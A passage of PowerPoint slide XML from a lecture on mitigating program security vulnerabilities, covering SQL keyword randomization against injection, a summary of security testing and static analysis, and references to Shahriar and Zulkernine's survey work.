              </a:rPr>
              <a:t> code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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conforms</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-120" dirty="0"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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>desire</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>syntactic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>structure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3500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="828040" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Interpreter executes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>implemented </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>throws  exception </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>injected </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(SQLI , </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Boyd </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>et</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-42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al. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2005)</a:t>
            </a:r>
            <a:endParaRPr sz="24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509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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Replace </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>keywords </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>with </a:t>
            </a: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random</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-22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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>tokens</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>becomes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SELECT123</a:t>
            </a:r>
            <a:endParaRPr sz="20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480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10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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fail</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-114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correctly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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substitute</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-70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keywords</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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random</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-50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tokens</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="25"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>De‐randomization</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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performed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="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before</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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engine</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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parses</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SELECT123 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>becomes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="2" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-2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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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not</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95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recognized</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-11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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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parser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-12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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-50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generates</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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warning</a:t>
            </a:r>
            <a:endParaRPr sz="20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653282" y="683006"/>
            <a:ext cx="2508250" cy="4673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900" spc="-20" dirty="0"/>
              <a:t>Part </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-5" dirty="0"/>
              <a:t>II:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" spc="-5" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr sz="290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53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93902" y="1413764"/>
            <a:ext cx="8246745" cy="3675379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287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-95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testing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="240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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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analogous</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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software</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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testing,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>except</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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some  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>changes </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>defining </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>requirements, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>coverage, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27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oracle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3450">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="591820" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>signature‐based </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>techniques </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>mainly </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>applied</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-380" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web‐based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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programs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35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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Static</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>may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lead</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to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false</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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positive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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warning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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="35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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Code randomization </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>would </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>effective, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>but</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-39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costly</a:t>
            </a:r>
            <a:endParaRPr sz="24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073144" y="616711"/>
            <a:ext cx="1837689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5" dirty="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-55" dirty="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>enc</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>es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54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93848" y="1361186"/>
            <a:ext cx="8108950" cy="4783455"/>
          </a:xfrm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marL="287020" marR="692785" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="236854" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>H. Shahriar and M. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Zulkernine, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Mitigating </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Program </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vulnerabilities: Approaches </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Challenges, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ACM </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Computing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Surveys </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>appear)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="266065" indent="-253365">
              <a:lnSpc>
                <a:spcPts val="1260"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPlain"/>
              <a:tabLst>
                <a:tab pos="266700" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>H. Shahriar and M. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Zulkernine, "Assessing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Test </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Suites </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vulnerabilities,"</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="22860">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>International </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Journal </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Engineering and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Knowledge </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Engineering (IJSEKE), </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>World </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Scientific,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vol. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>20, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Issue </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>1, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
